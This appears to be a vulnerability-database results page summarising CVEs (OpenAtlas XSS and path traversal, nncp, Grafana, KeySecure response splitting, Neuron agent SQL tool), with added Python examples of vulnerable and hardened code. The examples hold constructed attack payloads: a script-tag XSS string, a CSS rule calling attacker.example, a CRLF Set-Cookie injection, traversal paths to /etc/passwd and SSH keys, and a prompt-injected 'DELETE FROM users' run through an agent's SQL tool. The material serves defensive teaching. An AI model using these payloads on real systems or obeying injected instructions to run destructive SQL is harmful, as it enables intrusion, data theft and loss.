23 matches found
CVE-2025-57156
Summary (CVE-2025-57156) : A NULL pointer dereference in the owntone-server component, specifically in the dacp_reply_playqueueedit_clear function in src/httpd_dacp.c, can be triggered by a remote attacker in commits up to 6d604a1 (after version 28.12). This vulnerability allows remote Denial...
CVE-2023-25478
Cross-Site Request Forgery (CSRF) vulnerability in Jason Rouet Weather Station plugin <= 3.8.12 versions...
CVE-2025-67510
Neuron is a PHP framework for AI Agents. Versions 2.8.11 and earlier have a vulnerability in the MySQLWriteTool that can execute arbitrary SQL provided by the caller via PDO::prepare() and execute(), without semantic restrictions. In an LLM/agent context this enables prompt injection or indirect ...
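The Neuron entry describes a tool that hands whatever statement the caller (in practice the model, and so anyone who can inject into its prompt) supplies to a prepared-statement API. Prepared statements bind values; they say nothing about which verb runs or which table it touches. The following is an added example, not Neuron's code, written in Python with sqlite3 rather than PHP/PDO to keep it runnable offline; the table names and the "notes"-only allowlist are assumptions. It contrasts the vulnerable shape with a tool that owns the statement and accepts only data from the caller.

```python
import re
import sqlite3

# Assumption: the only table an agent is ever allowed to write to.
ALLOWED_TABLES = {"notes"}
# SQL identifiers the tool will accept as column names (no quotes, no spaces).
IDENT = re.compile(r"\A[A-Za-z_][A-Za-z0-9_]*\Z")


def setup() -> sqlite3.Connection:
    """Constructed in-memory schema: one table the agent may write, one it must not."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    conn.execute("INSERT INTO users (email) VALUES ('admin@example.org')")
    conn.commit()
    return conn


def write_tool_unrestricted(conn: sqlite3.Connection, sql: str, params=()) -> int:
    """Vulnerable shape: the caller chooses the whole statement.

    prepare/execute with bound parameters stops value injection, but here the
    statement text itself is untrusted, so DELETE, DROP or UPDATE on any table
    run just as happily as the intended INSERT.
    """
    cur = conn.execute(sql, params)
    conn.commit()
    return cur.rowcount


def write_tool_restricted(conn: sqlite3.Connection, table: str, row: dict) -> int:
    """Hardened shape: the tool fixes the verb (INSERT) and the target table.

    The caller supplies only a table name checked against an allowlist, and
    column/value pairs; values are bound, column names are pattern-checked.
    """
    if table not in ALLOWED_TABLES:
        raise ValueError(f"table not allowed: {table!r}")
    cols = list(row)
    if not cols or not all(IDENT.match(c) for c in cols):
        raise ValueError("bad column name")
    placeholders = ", ".join("?" for _ in cols)
    sql = f'INSERT INTO "{table}" ({", ".join(cols)}) VALUES ({placeholders})'
    cur = conn.execute(sql, [row[c] for c in cols])
    conn.commit()
    return cur.rowcount


def count_rows(conn: sqlite3.Connection, table: str) -> int:
    """Helper for the demonstration; only ever called with constant table names."""
    return conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]


def restricted_rejects(conn: sqlite3.Connection, table: str, row: dict) -> bool:
    """True if the hardened tool refuses the request."""
    try:
        write_tool_restricted(conn, table, row)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = setup()
    # A prompt-injected "cleanup" instruction reaches the unrestricted tool.
    write_tool_unrestricted(db, "DELETE FROM users")
    print("users left after unrestricted tool:", count_rows(db, "users"))
    print("restricted tool refuses users table:", restricted_rejects(db, "users", {"email": "x"}))
    print("restricted insert into notes:", write_tool_restricted(db, "notes", {"body": "hello"}))
```

The semantic restriction is the point: a write tool for an agent should expose an operation ("append a note"), not a SQL surface, so that nothing the model emits can change the verb or the table.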
CVE-2025-60917
A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary JavaScript in the context of a user's browser via injecting a crafted payload into the color parameter...
EUVD-2025-198896
An issue in the size query parameter handled in /views/file.py of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute a path traversal via a crafted request...
CVE-2025-56423
An issue in Austrian Academy of Sciences AW Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages...
PT-2025-47933
A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary JavaScript in the context of a user's browser via injecting a crafted payload into the color parameter...
Austrian Academy of Sciences OpenAtlas security vulnerability
Austrian Academy of Sciences OpenAtlas is a database application dealing with archaeology and history organized by the Austrian Academy of Sciences in Austria. A security vulnerability exists in Austrian Academy of Sciences OpenAtlas version 8.12.0 that stems from a login error message that could...
CVE-2025-60916
CVE-2025-60916 is a reflected XSS vulnerability in Austrian OpenAtlas. The issue affects the /overview/network/ endpoint prior to OpenAtlas v8.12.0, where an attacker can inject a crafted payload into the charge parameter to execute arbitrary JavaScript in a user’s browser. The Red Hat/EU ENISA/O...
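The two OpenAtlas entries above (the color and charge parameters of /overview/network/) both reflect a query parameter into the rendered page. Because a colour value most plausibly ends up inside a style attribute, output escaping alone is not a complete fix: escaping stops tag break-out but leaves CSS injection intact, so the parameter also needs an allowlist. The following is an added example, not OpenAtlas code; it uses Python because OpenAtlas is a Flask application, but is written as plain functions so it runs without Flask. That the value lands in a style attribute, and the hex-colour format, are assumptions; the payload strings are constructed.

```python
import html
import re

# Assumption: the parameter is meant to carry a CSS hex colour such as "#1a2b3c" or "#abc".
HEX_COLOUR = re.compile(r"\A#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})\Z")
DEFAULT_COLOUR = "#000000"


def render_network_unsafe(color: str) -> str:
    """Vulnerable pattern: the query parameter is interpolated into HTML verbatim."""
    return f'<div class="network" style="color: {color}">graph</div>'


def render_network_escaped_only(color: str) -> str:
    """Half a fix: HTML-escaping blocks tag break-out but not CSS injection."""
    return f'<div class="network" style="color: {html.escape(color, quote=True)}">graph</div>'


def render_network_safe(color: str) -> str:
    """Hardened: allowlist the value for its context, then escape it anyway."""
    if not HEX_COLOUR.match(color):
        color = DEFAULT_COLOUR
    return f'<div class="network" style="color: {html.escape(color, quote=True)}">graph</div>'


# Constructed payloads (not taken from the advisories).
# Breaks out of the attribute and the tag:
TAG_PAYLOAD = '"><script>alert(document.domain)</script><div "'
# Stays inside the attribute but turns a colour into an exfiltrating CSS rule:
CSS_PAYLOAD = "red; background-image: url(https://attacker.example/log)"


if __name__ == "__main__":
    for label, fn in (("unsafe", render_network_unsafe),
                      ("escaped only", render_network_escaped_only),
                      ("allowlisted", render_network_safe)):
        print(f"{label:13} {fn(TAG_PAYLOAD)}")
        print(f"{label:13} {fn(CSS_PAYLOAD)}")
```

The same shape applies to the charge parameter: decide what the value is allowed to be (here a colour; for charge, presumably a number), reject anything else, and still escape for the output context.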
DEBIAN-CVE-2025-60020
nncp before 8.12.0 allows path traversal for reading or writing during freqing and file saving via a crafted path in packet data...
PT-2025-39247
Name of the Vulnerable Software and Affected Versions: nncp versions prior to 8.12.0. Description: The software contains a path traversal flaw that could allow reading or writing to files. This issue occurs during the process of freqing and saving files when handling crafted paths within packet data...
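Both the OpenAtlas size-parameter entry above and the two nncp entries come down to the same defect: a path component taken from the request (or, for nncp, from packet data) is joined onto a base directory without checking that the result still lies inside it. The following is an added example, not code from either project (nncp itself is Go; Python is used here to match the rest of the examples on this page). The base directory and the sample paths are constructed.

```python
from pathlib import Path


def resolve_under(base: str, untrusted: str) -> Path:
    """Return base/untrusted only if it stays inside base after normalisation.

    Raises ValueError for anything that escapes: "..", absolute paths, an
    empty component (which would name the base directory itself) and NUL bytes.
    """
    if "\x00" in untrusted:
        raise ValueError("embedded NUL byte")
    base_dir = Path(base).resolve()
    # An absolute `untrusted` makes the join discard `base_dir`; resolve()
    # collapses ".." lexically and follows symlinks that already exist on disk.
    # (A symlink created between this check and the open is a separate TOCTOU
    # problem that a purely path-based check cannot close.)
    candidate = (base_dir / untrusted).resolve()
    if candidate == base_dir or base_dir not in candidate.parents:
        raise ValueError(f"path escapes base directory: {untrusted!r}")
    return candidate


def is_safe_path(base: str, untrusted: str) -> bool:
    """Boolean form of resolve_under for callers that only need a verdict."""
    try:
        resolve_under(base, untrusted)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # Constructed inputs: a request-supplied file name and a packet-supplied
    # "freq" path of the kind the advisories describe.
    for p in ("docs/report.pdf", "../../root/.ssh/authorized_keys",
              "/etc/passwd", "docs/../report.pdf", ""):
        print(f"{p!r:40} -> {'ok' if is_safe_path('/srv/files', p) else 'REJECTED'}")
```

Note what the check does not do: it does not try to strip ".." or reject "suspicious" substrings. Canonicalising the joined path and comparing it against the canonicalised base is the whole test; blacklists of traversal sequences miss encodings and platform quirks that canonicalisation handles.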
U.S. Dept Of Defense: CVE‑2025‑4123 — Grafana Open Redirect → Stored XSS → SSRF (Full Read) at ██████
A vulnerability, identified as CVE-2025-4123, was discovered in Grafana OSS and Enterprise versions 8.x through 12.x. The vulnerability allowed unauthenticated attackers to chain multiple flaws, including an open redirect through path traversal in the public redirect handler, stored cross-site...
Jellyfin Parameter Injection Vulnerability
Jellyfin is a freeware media system. It allows you to control the management and streaming of media. It is an alternative to the proprietary Emby and Plex, and can serve media from a dedicated server to end-user devices through multiple applications. A parameter injection vulnerability exists in...
CVE-2022-45812
creationtimestamp | type | source
--- | --- | ---
2023-05-08 16:51:22+00:00 | seen | https://t.me/cibsecurity/63421...
SUSE CVE-2019-15729
An issue was discovered in GitLab Community and Enterprise Edition 8.18 through 12.2.1. An internal endpoint unintentionally disclosed information about the last pipeline that ran for a merge request...
CVE-2023-0081
The MonsterInsights WordPress plugin before 8.12.1 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...
PT-2022-26971 · Splunk · Splunk Enterprise
Name of the Vulnerable Software and Affected Versions: Splunk Enterprise versions prior to 8.1.12, Splunk Enterprise versions prior to 8.2.9, Splunk Enterprise versions prior to 9.0.2. Description: The issue allows for a Reflected Cross Site Scripting via JavaScript Object Notation (JSON) in a query...
SafeNet KeySecure Management Console injection vulnerability
SafeNet KeySecure Management Console is a secure software package from SafeNet USA. A security vulnerability exists in SafeNet KeySecure Management Console version 8.12.0, which is vulnerable to HTTP response splitting attacks. A remote attacker can...
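HTTP response splitting, as named in the KeySecure entry, is CR/LF injection into a response header: a user-controlled value that reaches a header such as Location or Set-Cookie carries its own line break, so the client parses everything after it as further headers or a second response. The following is an added example, not KeySecure code; the header layout and the payload are constructed, and the serialiser is a minimal stand-in for whatever framework writes the response.

```python
CRLF = "\r\n"


def serialize_headers(headers: list[tuple[str, str]]) -> str:
    """Minimal header block writer: name: value lines, blank line terminator."""
    return "".join(f"{name}: {value}{CRLF}" for name, value in headers) + CRLF


def parse_header_block(raw: str) -> dict[str, str]:
    """What a client sees: every line up to the blank line is a header."""
    parsed: dict[str, str] = {}
    for line in raw.split(CRLF):
        if not line:
            break
        name, _, value = line.partition(": ")
        parsed[name] = value
    return parsed


def redirect_unsafe(target: str) -> str:
    """Vulnerable pattern: the redirect target goes into Location verbatim."""
    return serialize_headers([("Location", target), ("Content-Type", "text/html")])


def redirect_safe(target: str) -> str:
    """Hardened: refuse any CR or LF in the value before it touches the header."""
    if "\r" in target or "\n" in target:
        raise ValueError("CR/LF in header value")
    return serialize_headers([("Location", target), ("Content-Type", "text/html")])


def safe_rejects(target: str) -> bool:
    try:
        redirect_safe(target)
    except ValueError:
        return True
    return False


# Constructed payload: a redirect target that smuggles a Set-Cookie header.
PAYLOAD = "/home" + CRLF + "Set-Cookie: session=attacker-chosen"


if __name__ == "__main__":
    print(repr(redirect_unsafe(PAYLOAD)))
    print("injected header seen by client:", parse_header_block(redirect_unsafe(PAYLOAD)).get("Set-Cookie"))
    print("hardened handler rejects payload:", safe_rejects(PAYLOAD))
```

Two practical caveats: the check must run on the decoded value (a %0d%0a in the URL is a CR/LF by the time it is a header), and a bare "\n" is enough to split for many parsers, so reject both characters rather than only the CRLF pair.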
PT-2018-2144 · Mysql Server +1 · Mysql Connectors +1
Name of the Vulnerable Software and Affected Versions: MySQL Connectors versions 8.0.12 and prior Description: The issue is related to insufficient access control in the Connector/J subcomponent of the MySQL Connectors system. It allows a remote attacker to gain unauthorized access to protected...